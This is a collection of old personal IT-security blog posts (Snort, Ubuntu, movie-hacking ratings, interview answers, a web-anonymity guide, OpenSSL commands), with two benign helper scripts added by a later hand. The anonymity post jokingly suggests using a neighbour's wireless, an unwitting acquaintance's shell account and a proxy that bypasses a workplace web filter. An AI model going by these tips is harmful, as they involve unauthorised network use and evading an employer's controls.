    I like tutorials on sites. Even if I don't get around to trying out new things, it is nice to have the knowledge fly by my sight and to tuck the link away into my pocket (or a site post) for a rainy day when I decide I want to try it out. This link talks about using Snare and Splunk as a central multi-system log-gathering solution (a cheap alternative to LogLogic). I do need logging someday and definitely have plenty of options, including this combo.
    .: ubuntu and snort
    Snort is another item I want to start working with regularly as well. I know I won't become a Snort guru quickly, and just like any type of packet-watching role, it just comes with time and experience. This Ubuntu + Snort + Postgre tutorial may be helpful, even though I already have my Ubuntu "server" box upgraded to Feisty Fawn and might swap out Postgre for MySQL instead. Sadly, just last night I noticed my Ubuntu box (which has a decently new 200GB HD that has already developed a loud whine when it spins) may not be faring so well anymore after power outages. I had one this weekend and the console might be stuck on a BIOS or GRUB warning since it is silent on my network. I have to check it out tonight. Hmm...it might be old enough that it still requires something plugged into the keyboard port in order to boot properly... Got this link from Andrew Hay.
    .: ubuntu vs linux
    Network Computing has a nice comparison between Vista and Ubuntu. I've yet to even see Vista, really, but I can say I was disappointed that they didn't include DVD playback with the multimedia testing. Due to the proprietary encryption with any DVD playback, free and legit Linux distros tend to not be able to do this out of the box. I was happy to see mention of Ubuntu's occasional (and very frustrating) hardware issues (namely wireless or sound issues from what I've heard) which can send people back to Windows quickly.

    I think Ubuntu is a nice alternative for light users who don't install their own things and only need major things like email, web browsing, maybe some IM, music, picture viewing, and office productivity. Basically you don't need much more beyond what is installed by default. If you need more, you might be in for some learning curve issues.
    .: computer and security use in movies
    As computer and security hobbyists and professionals, I'm sure we all go to movies and take special note when something in our field comes up, from door locks to computer terminals displaying code to fuzzy images being blown up to reveal faces. Some of these make us cringe in wild distaste which pulls us out of the suspension of disbelief in the film experience while others make us smile and slightly nod in agreement, making a mental note to share with our other geek buddies.

    I have made a new category for this site called, simply, movies. In this category I want to make mention of movies that utilize a particular bit of computer use or security use and point out what is inaccurate about it. In fact, I'm going to call it Computer and Security Use in Movies (CSUM).

    Just to get a few ground rules out of the way, I will largely exclude sci-fi movies that assume advancements in technology make certain things possible or different from how we know computer security today. I also only want items that seem important to some degree to the plot of the film, and not just some extraneous bells-n-whistles item from the background. For instance, nothing from Star Trek will count.

    I will score each incident based on some criteria, modeled after a security assessment:

    Inaccuracy: 1-5 (5 being ridiculously inaccurate and 1 being only minorly inaccurate)
    Inaccuracy is used to scale exactly how ridiculous a particular use of computers and security is portrayed. Something that is not ridiculous at all, and, in fact, might be entirely accurate may be able to score a rare 0 in this category, thus ensuring a total score of 1. A 1 is the ultimate score.

    Criticality to plot: 1-5 (5 being critical to the plot or film experience and 1 being trivial)
    If an inaccuracy is highly critical to a plot, it becomes less forgiving by the audience. Likewise, inaccuracies in smaller, less important parts of the film can be overlooked. This is a scale on how important the situation is for the movie as a whole.

    Ease of correction: 1-5 (5 being extremely difficult or impossible to correct without the plot or film experience falling apart, 1 being extremely easy to fix without impacting the film)
    If an inaccuracy is easy to correct, it really shouldn't have been a mistake in the first place, and might just be the fault of the technical advisor or writer, or maybe even an artistic decision because the real deal is boring to portray. Something that is extremely difficult to correct means that inaccuracy is so deep, there really is no way to save or spin it without running into major problems. This is essentially the scale of how badly wrong a movie gets this situation.

    The total is the product of all three numbers multiplied together to give a score from 1 to 125. Hopefully no movie scores 125 as that would be a ridiculously inaccurate, critical situation in the film that has zero hope of being fixed without the film falling apart. Feedback and suggestions on better scoring are welcome!

    .: csum: independence day
    CSUM rates: Independence Day (1996)

    Situation: Towards the end of the film, Will Smith's character makes a last ditch attack against an invading alien army by injecting a computer virus into the alien mothership's systems. The virus is successful and the invasion is defeated.

    Inaccuracy: 5
    Ok, while I will say that one could argue the universality of the binary system, I don't think it is even possible that a wholly distinct civilization will have advanced independent of the human race and end up with compatible machine code. Hell, Windows and Macs don't even have viruses that are compatible on either system (a few exceptions exist with third-party apps) let alone entirely different civilizations. I think the biggest joke at the time of this movie was the question, "Are the aliens running Windows or something?!"

    Criticality: 5
    Maybe the budget disintegrated by the end of the film and they needed a one-shot deal to blow up the aliens; all of them. I don't know, but this is a pretty darned critical contrivance because it is the vehicle for Will Smith to save the world; the climax of the film. It's a shame it had to be so ignorant.

    Ease of correction: 4
    The year is 1995/1996, and I think it was obvious the producers wanted to capitalize on the emergence of computers and the Internet, and with it viruses. Unfortunately, there is no salvage to getting an earth computer virus to disrupt alien technology, so there is really no saving this idea. The writers needed another entirely different solution to save this; even Will Smith flying into the center of the ship and destroying the Mother Brain would have been more believable.

    CSUM ICE Score: 100 (F) I will never forgive Independence Day for this amazingly ridiculous use of a virus in a film.
    .: ten top open source security tools
    An article out of IT Management on Earthweb (hell, I can barely find out what this site is called...IT Management? Earthweb? Datamation? I think that's an ad in the traditional site header slot, but am not sure...ugh!) outlines 10 top open source security tools. While I can usually nitpick something in most lists from unknown sites, I was pleasantly surprised by the well-rounded list presented. Then again, some of these can be fairly easy when you have lists like Insecure.org's top tools list.

    I also am saddened but have to say (almost as a reminder to myself) that I need to someday actually read the Open Source Security Tools: A Practical Guide to Security Applications. Books don't get younger on their own!
    .: twenty interview questions
    This is a list of 20 web developer interview questions picked up from SEOmoz via Dan Morrill. I really like interview questions because they can give you good practice. When I am looking for a job (which I currently am) I actually do rehearse to myself (and typically write down) answers to typical questions such as my weakness, my strength, team vs work alone, why the current job is not right, what I want in a job, a manager, life, and so on. In fact, I plan to carve out a spot in my wiki to someday house these questions and my answers for future reference. And one thing I do stress in any interview is to be honest and positive. Admit a weakness, don't cop out or cover it up. Use it as an opportunity to show the employer you know yourself and that you have a plan to address that weakness. Anyway, this looks like a long post, but here's some answers for these questions (some are pertinent only to web developers, though!).

    1. What industry sites and blogs do you read regularly?
    I tend to cop out here and say that I read a lot of things, mainly blogs and online news sites, which are all in my RSS reader and listed on my website on the right. But I do try to stay concrete and mention some of my A-list links such as TaoSecurity, Jeremiah Grossman, Ha.ckers.org, Security Monkey, Internet Storm Center, Errata, F-Secure, Full Disclosure, and so on largely depending on what type of job I am working on. I do like to make sure I know a nice mix of my favorite sites to read so that I can pull them out quickly without floundering. I remember years ago someone asking me what my favorite hacking site was and kinda floundering and sputtering out PacketStorm just because the guy was a suit who thought he knew hacking. When given a chance, though, I always want to say that I read up on sites every other day if not daily for the important ones.

    2. Do you prefer to work alone or on a team?
    I love this question and hate it. I love it because my honest answer is both fairly equally. I hate it because that is the prototypical bullshit answer. So I feel obligated to expound! I love working alone because sometimes you can just put your head down and really concentrate on working either through a problem or something that is otherwise tedious. It is true that sometimes in IT too many hands in the kitchen make too big a mess, or will try to do things in different ways such that nothing ends up getting done with any semblance of quality. I also love working on a team because there are times when I don't know everything and need help, times when I physically cannot get all the work done by a deadline without extra hands, and times when just talking a problem through to someone else will jog my thoughts and give me fresh ideas. I truly do enjoy both and am quite comfortable working in either environment as long as the company and manager and colleagues are supportive and get shit done. I have experience working both ways.

    3. How comfortable are you with writing HTML entirely by hand?
    Very. I've never used a WYSIWYG editor and don't even need color-coded parsing to help out. Give me notepad and I'm fine.

    7. Describe/demonstrate your level of competence in a *nix shell environment
    I would put my level of competence in a *nix shell environment as beginner to intermediate, although people with less experience than me might rate me higher. I tend to place myself lower than I should be, only because there is so much power in *nix shells and so much to learn. I feel just slightly more comfortable inside a CLI as opposed to a GUI.

    8. What skills and technologies are you the most interested in improving upon or learning?
    For a learning junkie like me, this includes everything! I am most interested in learning whatever is needed or is tickling my muse at the moment, within reasonable bounds so that I don't try to do too much and end up with minimal knowledge in lots of things. I do strive for expert level knowledge in the things I can tackle on a day to day basis and intermediate to high knowledge in things I do on my own or less often outside the day to day job. Specifically, I want to continue to improve my Linux exposure, wireless foo, and security assessments. I want to get hands-on into Snort and log correlation over a network.

    11. Show me your code!
    View source my code yourself! But keep in mind I'm not a pro web developer, nor do I update my code all that often. My old site is rife with old junk that makes me cringe. This site is slightly cleaner since it is years newer.

    12. What are a few sites you admire and why? (from a webdev perspective)
    Digg and Google are excellent and clean. I like sites that are clean, offer up their functions, and are not hard on the eyes and soul (ads all over, weird links, blah blah). Give me aesthetically pleasing any day, not MySpace-like. A clear, simple layout.

    14. I just pulled up the website you built and the browser is displaying a blank page. Walk me through the steps you'd take to troubleshoot the problem.
    Blame the network guys! Hehe, kidding. I would first replicate the problem on my end so that I can see what is going on. Then try to do a view source to make sure I'm hitting the right location and see what the browser is being presented. If the problem is network-related, drop into a CLI and start investigating DNS and IP connectivity. If the problem appears to be code-related, check the code from the View Source and make adjustments. Possibly get on the server and try to pull the page up locally on the server, check the logs, fashion test pages to troubleshoot IIS/Apache functionality...

    16. Do you find any particular languages or technologies intimidating?
    I really like this question and have sadly never heard it in an interview! I am currently most intimidated in general by just doing something new for the first time that I'm unproven with. For instance, being challenged to do something that might not be possible can be really intriguing yet frustrating. I'm aware of this intimidation and work to keep it cornered as much as possible. Specifically, I am most intimidated lately by ordering the proper equipment that is compatible and not over-budget for the needs. I think that's largely inexperience coupled with spending someone else's money.
    .: suggested games
    I've been an on-again, off-again PC gamer. My background is heavy into first-person shooters (FPS) from Doom 1 until FEAR. I think I spent half my college years playing Quake and UT. It's amazing I actually got the grades I did and even graduated...I know too many people who dropped out due to their playing habits.

    Here are some games I would highly recommend you play if you do any PC gaming at all. Some of these are classics that no one should be able to say they've not experienced.

    Doom 1 and 2 - There is still no FPS PC game that has been able to recapture the hectic, hellish feel of the originals. Doom 2 is still so challenging to this day to me that I continually play it every few months to advance a few more levels in my spare time (I strive for 100% secrets and kills when actually possible). I still have the original floppies...

    Quake - Quake grabbed the baton from Doom and ran with it, propelling PC sales, bandwidth demands, and PC gaming as we know it today. Nothing ever will capture the feel of anonymously running around levels throwing out rockets and fragging fellow geeks into the late hours of the night. This was Internet gaming in its innocent infancy, and it still makes my cheeks tingle with memories. Must be experienced not just single-player, but LAN-borne with friends. Sound effects and most of the background music mixed by NIN make for an excellent backdrop as well.

    Serious Sam I - The first Serious Sam had a lot of gimmicks, but one of the best things about this game is how it harkened back to the hectic pace from the original Doom games. No game has come closer to the single-player experience of Doom as this game as it throws hordes and hordes of enemies at the player and usually not enough ammo to feel comfortable. One of the only games I've ever actually heard the sound effects for when trying to sleep (those damned hooves...noo...always behind me...!)

    Unreal Tournament - I really don't think any game before or after has looked or sounded quite as good as this one while also being as purely fun in multi-player mode. The excellent electronica music alone is worth the ride. Sadly, if you do get on FFA games these days on the net, chances are you'll be playing with people who have played for nearly ten years now. It won't be pretty, but it can still be very fun! Perfect LAN party fodder as it won't tax systems these days!

    Warcraft II - Basically the father (albeit not the grandfather) of all RTS games today, Warcraft II had a perfect chemistry of fun and challenge. I still play this game through single-player mode every few years. The expansion pack is also a must.

    Starcraft - The follow-up to Warcraft II is maybe even more perfect with upgraded graphics, deeper complexity in units and builds, and one of the most compelling story lines I've played through in a PC game. I also play this and the expansion pack regularly every few years.

    Wing Commander II and III - I loved these games. I'm not a flight sim guy, so these games met my needs just right with complex, but not too complex, controls. I loved the changing experience depending on how you complete missions and the specially named enemies with their own challenges and quirks. WC III particularly perfected the sense of isolation for a space fighter pilot.
    .: trillian vulnerability asks who is responsible for user apps
    I see ISC has posted about a vulnerability just disclosed in Trillian. The vulnerability is a little exotic but does have a scary side to it. First, it involves the use of the Trillian IRC client. Thankfully, I don't know many non-geeks who use IRC and none that use Trillian as their IRC client (I would hope!). The scary part is that it is trivial to determine if someone's IRC client is Trillian, and the vulnerability is triggered by merely hovering over a link posted in chat. Yikes! I expect milw0rm or even Metasploit to have an exploit available soon enough.

    One big question for this is: Do you know what apps your users are running? Are some of them running Trillian? And if so, who is then responsible for upgrading to more secure versions of their apps? (Then again, maybe they don't need IRC at work anyway, so just block the ports at the firewall and hope they're not on laptops at home being rooted?) More fuel if you don't have a handle on corporate policy for unauthorized software.
    .: pet peeve: the escalating rumor mill based on tech-speak
    Chief Security Monkey has a story post today about being careful what you say as an IT expert:
    I went back to my friend, told her that there was nothing unusual on the IDS and mentioned the targeted Word attack that had been reported [by another company] and its similarities. Unfortunately, the helpdesk tech overheard our conversation and subsequently reported back to his boss that I said we were infected and that was the cause.
    Oh man, I really hate that! And some people wonder why we become a little guarded and seriously careful about what we say! I've had occasions where I've responded to spyware or a virus and mentioned something about attackers or hackers, and the gossip centers on just one word that you can easily guess: "We've been hacked!" I've had sales people email each other for hours escalating the issue just amongst themselves before someone had to step in and tell them to shut up because it wasn't true.

    Of course, this happens in IT as a whole too. I hate having to say, "Well, in our environment we really can't implement technology X very well at all..." only to have their Geek Squad son say, "Sure they should be able to do that!" which causes me months and months of grief and point-counterpoint.

    Again, I say, it's no wonder we can quickly become guarded and quiet unless absolutely sure about something.

    So, to spin this back around into something positive, how does one combat this? I think it is just all about people skills and communication skills. Make sure people know you as the expert and that mistakes or misstatements can still happen, but you'll gladly offer correction as needed. Don't be afraid to be wrong and don't be so arrogant that everyone wants to hold your mistakes over your head for years to come. Learn who the drama queens are in the company, and be extra careful what you discuss with them.
    .: staying anonymous - part 2 the web
    Web browsing (blogs, forums, web-based IRC) - When you browse the web, you leave a trail in your wake: your IP address and sometimes other bits of data that curious persons want to gather. If nothing else, you leave behind your IP in web server log files which any curious or enterprising admin likely picks through. Why do you want to stay anonymous? That was addressed in part 1 of this series.

    There are five major realms when it comes to anonymity on the web:
    1) general anonymity protections
    2) browsing trackbacks such as what is captured in web server log files
    3) browser hijacking, remote information leakage, and artifacts like cookies
    4) communication channel eavesdropping
    5) additional items on newsgroups and RSS


    1) general anonymity protections
    In general, if you want to stay anonymous online, don't connect to sites or other servers from your home IP address. Hop on a wireless hotspot or "borrow" a neighbor's wireless connection (again, I didn't suggest that...right?). This way any tracebacks will maybe point to the state or area you live in or even your local podunk ISP, but likely won't be tracked back directly to you without some legal overtures. If you're doing nothing criminal, the chances are slim that anyone will ever notice. (Although that does not necessarily make it legal or digitally ethical.)

    If you insist on doing personal things such as banking or updating your own personal blog that is not so anonymous, those are things you should save your home IP and connection for. Keep in mind that I do not encourage checking your ebay auctions or transferring paypal monies through web proxies or while connected to non-trusted networks. You never know who is eavesdropping on you or collecting information on what you thought was an innocent open web proxy.


    2) trackbacks via what is captured in web server log files
    Browsing trackbacks include leaving behind information on log files that may contain your IP address, computer name, browser version, and so on.

    The biggest means to stay anonymous with general web browsing is to use one or more anonymous web proxies. A web proxy will relay your connection from it to the site you are attempting to browse, such that the target site does not know who you are and instead records information from the web proxy server. Let's say you want to buy some condoms, but your dad works the counter at the closest drug store that sells them. Instead, you ask someone else to go inside and buy them for you. This person is acting on your behalf, i.e. your proxy. Web proxies work the same way by fetching web pages on your behalf and then delivering them to you. Honestly, once you start using proxies, they are very easy to use and you should probably use them most of the time if you are concerned about your anonymity (with the exception of your bill-paying and banking...).

    These can be a bit of a pain to work with. Some web proxies are located in odd places of the world and thus their latency is sometimes prohibitive. Others actually translate text for you (eternally helpful, especially if you don't speak Lithuanian...), and others are simply not meant to be open and can disappear without notice. Some are commercial and some are not and some don't even know they are open and used.

    One long-standing list of web proxies has been samair.ru. Be aware that not all proxies are made equal and you will want to test out just how anonymous you appear. Do not settle for leaking any information, so typically, you want "highly anonymous" or something to that effect. Setting yourself up on a proxy is as easy as picking one out and going into the connection options of your browser. Supply the necessary IP and port as a proxy and surf away. You can check what your IP appears to be at www.whatismyip.com and you can check your actual proxy leakage at samair.ru. I highly suggest Googling up a few proxy checker tools just for second and third opinions. Also, try baselining the information you leak by using these checkers when you're not using a proxy. Identify what you want hidden, and get it hidden. (Disclaimer: I don't encourage you to use web proxies that you are not authorized to use; do as you wish.)

    I also have seen a site called www.e-proxy.info (thank you Chris!) which can deliver web pages to you through a browser-based proxy. This is really pretty slick and actually works in my office, bypassing SurfControl while also not looking too obtrusive by hiding up at the top of my browser window. Sweet!

    As an advanced technique, if you want to set up a series of proxy servers to route your traffic through, this is typically called chaining, in case you want some Google terms to search for.

    Are these foolproof? Like almost everything in life, no they are not. But for many instances, a relatively simple step like using a web proxy gives quite a lot of gain. One potential problem comes up if you use some arcane or exotic user agent or web browser. If you leave behind an anonymous IP but a user agent like "BriansTestBrowserBar 0.4," you may as well ditch the proxy.
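    The "how anonymous do I appear" check described above, seen from the server side: this is an added example, not code from the original post, showing the grading logic a proxy-checker CGI page would apply to the request it receives. Records are written in CGI environment style, and every address, host name and user agent below is constructed; it assumes a grep that understands -w.

```shell
#!/bin/sh
# Added example (not from the original post): how a "proxy checker" page
# grades a proxy from the request it sees. All values below are constructed.
set -eu

REAL_IP="192.0.2.44"          # the tester's own address, used as the baseline

# No proxy: the server sees the real address directly.
DIRECT="REMOTE_ADDR=192.0.2.44
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux i686; rv:1.8) Gecko/20060101 Firefox/1.5"

# Transparent proxy: different REMOTE_ADDR, but the proxy passes your address on.
TRANSPARENT="REMOTE_ADDR=203.0.113.10
HTTP_X_FORWARDED_FOR=192.0.2.44
HTTP_VIA=1.1 cache.proxy.example
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux i686; rv:1.8) Gecko/20060101 Firefox/1.5"

# Anonymous proxy: admits it is a proxy, but does not say for whom.
ANONYMOUS="REMOTE_ADDR=198.51.100.7
HTTP_VIA=1.1 relay.example
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux i686; rv:1.8) Gecko/20060101 Firefox/1.5"

# "Highly anonymous" proxy: looks like an ordinary client, but the odd
# user agent the post warns about still singles this visitor out.
ELITE="REMOTE_ADDR=198.51.100.9
HTTP_USER_AGENT=BriansTestBrowserBar 0.4"

# Variables under which proxies pass on the client address or announce themselves.
PROXY_VARS='HTTP_(X_FORWARDED_FOR|X_REAL_IP|CLIENT_IP|VIA|FORWARDED|X_PROXY_ID|PROXY_CONNECTION)'

# Print the value of one variable from a record (empty if absent).
field() {
    printf '%s\n' "$1" | sed -n "s/^$2=//p"
}

# Grade a record against the tester's real address.
# Prints one of: direct | transparent | anonymous | elite
proxy_level() {
    record="$1"; real_ip="$2"
    if [ "$(field "$record" REMOTE_ADDR)" = "$real_ip" ]; then
        echo direct; return
    fi
    proxy_hdrs=$(printf '%s\n' "$record" | grep -E "^$PROXY_VARS=" || true)
    if printf '%s\n' "$proxy_hdrs" | grep -qwF "$real_ip"; then
        echo transparent          # the real address leaks in a proxy header
    elif [ -n "$proxy_hdrs" ]; then
        echo anonymous            # proxy headers present, real address absent
    else
        echo elite                # nothing marks this as proxied at all
    fi
}

# Crude heuristic for the user-agent warning: mainstream browsers of the era
# all identify as Mozilla/... or Opera/...; anything else is a fingerprint.
ua_is_rare() {
    case "$(field "$1" HTTP_USER_AGENT)" in
        Mozilla/*|Opera/*) return 1 ;;
        *) return 0 ;;
    esac
}

# Report one record roughly the way a checker page would show it.
report() {
    level=$(proxy_level "$1" "$REAL_IP")
    ua_is_rare "$1" && ua=" (rare user agent, fingerprintable)" || ua=""
    printf '%-12s seen as %s%s\n' "$level" "$(field "$1" REMOTE_ADDR)" "$ua"
}

for r in "$DIRECT" "$TRANSPARENT" "$ANONYMOUS" "$ELITE"; do report "$r"; done
```

    Running the DIRECT record first gives the baseline the post recommends: whatever shows up there is what you want a proxy to hide.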


    3) browser hijacking, remote information leakage, and artifacts like cookies
    While you can remain relatively anonymous on the web using just a proxy to relay your connections, there are still means to leak information. You might run into hostile scripts that will try to hijack your system or perhaps harvest cookies from your browser, just to name a few.

    To thwart such attacks, it is best not to pretend you are safer or anonymous using Windows or Internet Explorer, especially in combination. Use a non-Windows OS and Opera, Firefox, or even a non-graphical (text-mode) browser.

    Keep your cache and stored cookies as clean as possible. Try not to store cookies and definitely do not store passwords in your browser. Just write them down or store them more securely out of band of your browser. In fact, it makes a lot of sense to do your anonymous web browsing from a virtual machine that you can revert to a known clean state every day.

    Be sure you also do not leak information by reusing usernames and passwords. If you use the username TheAvengerr69 on 4 forums and you use the same password on each one, simple Google searches can draw the lines between them and start revealing a profile of who you are and what you do. This is especially useful to someone looking to manipulate you. Also assume that every site you sign up for has curious admins who now have your account information. Do not blindly reuse login names and/or passwords.

    Here is an illustration. Think about how many forums you might have signed up for and posted one, maybe two questions, and then never revisited again. What if those forums, like the many thousands out there, do not get updated with new forum software versions. This might mean that one of those forums may get owned and leak out its database of users (sure, they just want the emails to spam, right?). Now your account information is in someone's hands just because you visited there once. Now let's say your username was DopplegangerJoe69 and your email was a hotmail address and your password "sitonyourface." In fact, that's the same password and username you use in a few places. Oh my, and that's the password you use for that hotmail account. Sucks to be you, Joe. I hope you don't store a lot of "password reminders" and "thanks for signing up here's your password" emails on that hotmail account!


    4) communication channel eavesdropping
    Generally, there is not much you can do to protect the communication channel from eavesdroppers, if, for instance, you are browsing the web from a public hotspot. If the site itself does not have SSL enabled, you are typically out of luck. However, some proxies can be set up to relay secured communications. Better yet, find yourself a box or shell account or buddy who doesn't know better and set yourself up an SSH tunnel which can act as your first hop. While your entire communication may not be hidden, at least you are hidden from where you physically sit to some arbitrary place on the net. The easiest way to do this might be to set up an SSH server and tunnel through your home connection. From there, relay through a web proxy to anonymize yourself. You can also utilize Tor onion routing, which I plan to go over in a separate post.

    Of note, I do consider this step to be beyond most everyone but the paranoid, but it does make sense to technically-friendly people who browse from untrusted networks often. Personally, I love hotspots at coffee shops, so I tend to tunnel through SSH whenever I do anything beyond browsing the news.


    5) additional items on newsgroups and RSS
    Two minor tidbits on newsgroups and RSS feeds. Try not to use stand-alone clients on your box for RSS or newsgroup browsing. They typically aren't as universal when it comes to proxy support, so they tend to connect directly to the target and leave behind your IP address, if nothing else. Whenever possible, sign up for Google Reader or Google Groups and leverage the extra hop that Google provides in hiding your origin. Let Google's servers act as your proxy. Be aware that there is still theoretical talk about malware abusing RSS feed parsing. I don't consider this a reality yet, but the theory is sound. Newsgroups also may have messages that contain malware or malicious links. Be cautious.


    Bonus: For the truly paranoid, watch what terms you search for in search engines. Last year there were some high profile disclosures of search terms that, while "sanitized," still revealed sensitive or private information. If I searched for "Michael Dickey" in Google from my "anonymous" web proxy that I've used for years, I've just tied that web proxy IP to that search term. Do enough of those personally identifiable searches and you can leave behind a small trail. Now, the chances of all the planets aligning to reveal your searches and shatter your web of anonymity are slim, but there are some people who are this paranoid. If you want to help prevent this, just search for personal stuff on your own home connection, just like you should be doing your banking and other sensitive stuff from your trusted home connection. Likewise, don't search for HideousPurplePeopleEater69, your super-secret online pseudonym, from your home network and tie that name to your home IP.


    Do I go to these lengths myself? I definitely do not get draconian about my search terms, but I do encourage using different networks or web proxies for browsing the darker bits of the web. If I felt the need, I likely would also utilize a throw-away VM to do some browsing as well. I think that I, and most tech-savvy people, can get by with following, to some degree, steps 1, 2, 3, and 5. Setting up your own remote secure access and being mindful of your searches are really for either the more technically-inclined or the ultra-paranoid.

    If you would like more information about staying anonymous on the web, I suggest searching Google for "staying anonymous on the web," "onion routing," "SSH tunnel," and other keywords found scattered above.
    .: wsus 3 released
    WSUS 3.0 has been released. I'm bouncing this link over where I found it, The Sean Blog, since he made a nice list of the pertinent downloads. If you don't know WSUS or don't use it and don't do anything special for Windows patch management, you should really look into WSUS. It does one set of tasks and does it very well.
    .: attachment and rules
    If you impose punishments on the troops before they have become attached, they will not be submissive. If they are not submissive they will be difficult to employ. If you do not impose punishments after the troops have become attached, they cannot be used. -The Art of War, Chapter 9: Maneuvering Armies
    .: consistency, consistency
    Roger A. Grimes recently posted up an article that made a lot of simple sense. He talked about the effect of consistency, even amongst just the basic security principles, and how that can increase security. I really couldn't agree more. Consistency is highly important. Of course, metrics are important, but also make sure to pick the right ones and be consistent with them as well.
    How many of us work in computer security environments where basic security recommendations are not applied consistently? I think it is nearly impossible to find a company that consistently and universally applies basic security tenets. So, we have inconsistencies, cracks in the system, and bad things are allowed to occur. The very human nature of purposefully allowing inconsistency as a norm leads to below-average outcomes. Taking a personal and institutionalized interest in applying basic security principles consistently will mitigate more risk and lead to a more secure environment.
    .: openssl basics
    I like the idea of posting regularly the things that I've learned. I've long put off getting SSL on this site, but I think I need to get with it to secure what few logins I have (which I only use at work and home anyway...). Curiously, this week I've been working with SSL at work, so I learned a few things running OpenSSL. Here are the basics. (technically I relearned this since I've done this all years back, but had to look it all up again anyway...)

    To split an exported private key/certificate from IIS (.pfx format) into a more readable format:
    openssl pkcs12 -nodes -in exportedfile.pfx -out outfile.pem
    If you provided a password (like a good IIS admin!) to the exported private key, you will be prompted for it. To view the private key and certificate parts, just open the resulting pem file in a text editor. Both parts are enclosed in appropriate tags.

    To just view the private key and certificate from the pfx file:
    openssl pkcs12 -info -nodes -in exportedfile.pfx
    To make a Certificate Signing Request (CSR):
    openssl req -new -newkey rsa:2048 -keyout yournewkey.pem -nodes \
     -out yournewcsr.pem
    Save the key because this is the private key. Provide the yournewcsr.pem contents to the preferred CA such as Verisign, Thawte, or even your local CA if you have your own PKI. Once you get the certificate back and you're using Apache, you want to follow Apache instructions (I'll post this another time) to place the private key file and this cert file where Apache can use them. If you're using IIS, you probably want to convert it back into the normal pkcs12/pfx format:
    openssl x509 -in certnew.cer -inform DER -out yournewcert.pem \
     -outform PEM
    You can then import it into IIS for use with web sites. In my case at work, we just left the pieces separated for use in our new Load-Balancer/SSL Terminator. Our IPS, however, would prefer the compounded format used by IIS along with the passphrase.

    What if you just want a self-signed cert? This means it is free to you, although your browser may give fairly benign complaints about the cert not being signed by someone you trust. This is ok for most sites, including mine and other internal stuff:
    openssl req -x509 -days 365 -newkey rsa:2048 -keyout myselfsignedkey.pem \
     -nodes -out myselfsignedcert.pem
    Might want to increase the 365 days to many, many years. Ten years is pretty decent and a bit easy to calculate (3650).

    All of these commands used -nodes which does not mean "nodes," it means "No DES." This leaves the private key unencrypted. For anyone who has studied CISSP material (or even Security+) you really don't want to leave your private keys unencrypted. You want them encrypted:
    openssl rsa -des3 -in yourprivatekey.pem -out yourprivatekeyencrypted.pem
    This will prompt for a passphrase and output the private key in an encrypted form. If you want to decrypt this key later:
    openssl rsa -in yourprivatekeyencrypted.pem -out yourprivatekey.pem
    I think that about does it for now. OpenSSL has tons of little options and modes, so if you find yourself getting an itch to learn more about SSL, check it out. Oh, and it comes in Linux and third-party Windows flavors for convenience. I actually really like the Windows version as it gives some nice, powerful tools for quick use to otherwise clunky Windows GUIs and servers.
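    The steps above run end to end, as an added example that is not from the original post: a self-signed cert, a CSR, the DER-to-PEM conversion, encrypting a -nodes key, and bundling key and cert into the .pfx that IIS wants (a step the post mentions but does not show), each followed by the check a careful admin would add. It assumes openssl is on the PATH; file names, the subject and the passphrase are made up, and AES-256 stands in for the post's -des3 since the command shape is identical.

```shell
#!/bin/sh
# Added example, not from the original post: the OpenSSL steps above run end
# to end in a scratch directory, with the checks a careful admin adds.
# Assumed: openssl on PATH. File names, subject and passphrases are made up.
set -eu

WORK="${WORK:-$(mktemp -d)}"
cd "$WORK"
SUBJ="/CN=example.test"        # constructed subject, so req never prompts

# Self-signed cert, ten years, unencrypted key (-nodes = "no DES").
make_selfsigned() {
    openssl req -x509 -days 3650 -newkey rsa:2048 -nodes -subj "$SUBJ" \
        -keyout selfsigned-key.pem -out selfsigned-cert.pem 2>/dev/null
}

# CSR plus a fresh key, then verify the CSR's own signature before sending it off.
make_csr() {
    openssl req -new -newkey rsa:2048 -nodes -subj "$SUBJ" \
        -keyout csr-key.pem -out request.csr 2>/dev/null &&
    openssl req -noout -verify -in request.csr >/dev/null 2>&1
}

# Encrypt a -nodes key with a passphrase (AES-256 here instead of -des3).
encrypt_key() {
    openssl rsa -aes256 -in selfsigned-key.pem -out selfsigned-key-enc.pem \
        -passout "pass:$1" 2>/dev/null
}

# An encrypted PEM key carries an ENCRYPTED marker; a -nodes key does not.
key_is_encrypted() {
    grep -q ENCRYPTED "$1"
}

# Does this key belong to this cert? Compare the RSA modulus of each.
# Args: key file, cert file, key passphrase (ignored for unencrypted keys).
key_matches_cert() {
    k=$(openssl rsa -noout -modulus -in "$1" -passin "pass:${3:-none}" 2>/dev/null | openssl md5)
    c=$(openssl x509 -noout -modulus -in "$2" | openssl md5)
    [ -n "$k" ] && [ "$k" = "$c" ]
}

# A CA often returns DER; convert to PEM as the post does and make sure the
# round trip loses nothing.
der_roundtrip() {
    openssl x509 -in selfsigned-cert.pem -outform DER -out certnew.cer &&
    openssl x509 -in certnew.cer -inform DER -out certnew.pem -outform PEM &&
    cmp -s selfsigned-cert.pem certnew.pem
}

# Bundle key+cert into a passworded .pfx for IIS, then split it again with the
# post's "pkcs12 -nodes" command and confirm both halves came back.
pfx_roundtrip() {
    openssl pkcs12 -export -inkey selfsigned-key.pem -in selfsigned-cert.pem \
        -out bundle.pfx -passout "pass:$1" &&
    openssl pkcs12 -nodes -in bundle.pfx -out split.pem -passin "pass:$1" 2>/dev/null &&
    grep -q 'BEGIN CERTIFICATE' split.pem && grep -q 'PRIVATE KEY' split.pem
}

# Run everything; returns non-zero on the first failed step or check.
run_all() {
    pw='correct horse battery staple'    # constructed passphrase
    make_selfsigned && make_csr && encrypt_key "$pw" &&
    ! key_is_encrypted selfsigned-key.pem &&
    key_is_encrypted selfsigned-key-enc.pem &&
    key_matches_cert selfsigned-key-enc.pem selfsigned-cert.pem "$pw" &&
    ! key_matches_cert csr-key.pem selfsigned-cert.pem &&
    der_roundtrip && pfx_roundtrip "$pw"
}

run_all && echo "all checks passed in $WORK"
```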
    .: flogviewer
    I've posted about baretail previously as a tail program for Windows, but now I see there is a similar tool with some more functionality to it. fLogViewer picks up and runs with the "Windows way" by taking a simple tool and putting more and more features onto it (note: Yes, I am fairly sarcastic there, but the features are appreciated nonetheless!). I kinda like this tool, although the necessity of an install and the way it uses some older system files than what I have on my XP system anyway are detractors to replacing baretail with fLogViewer.
    .: top 25 moments in sci-fi from the last 25 years
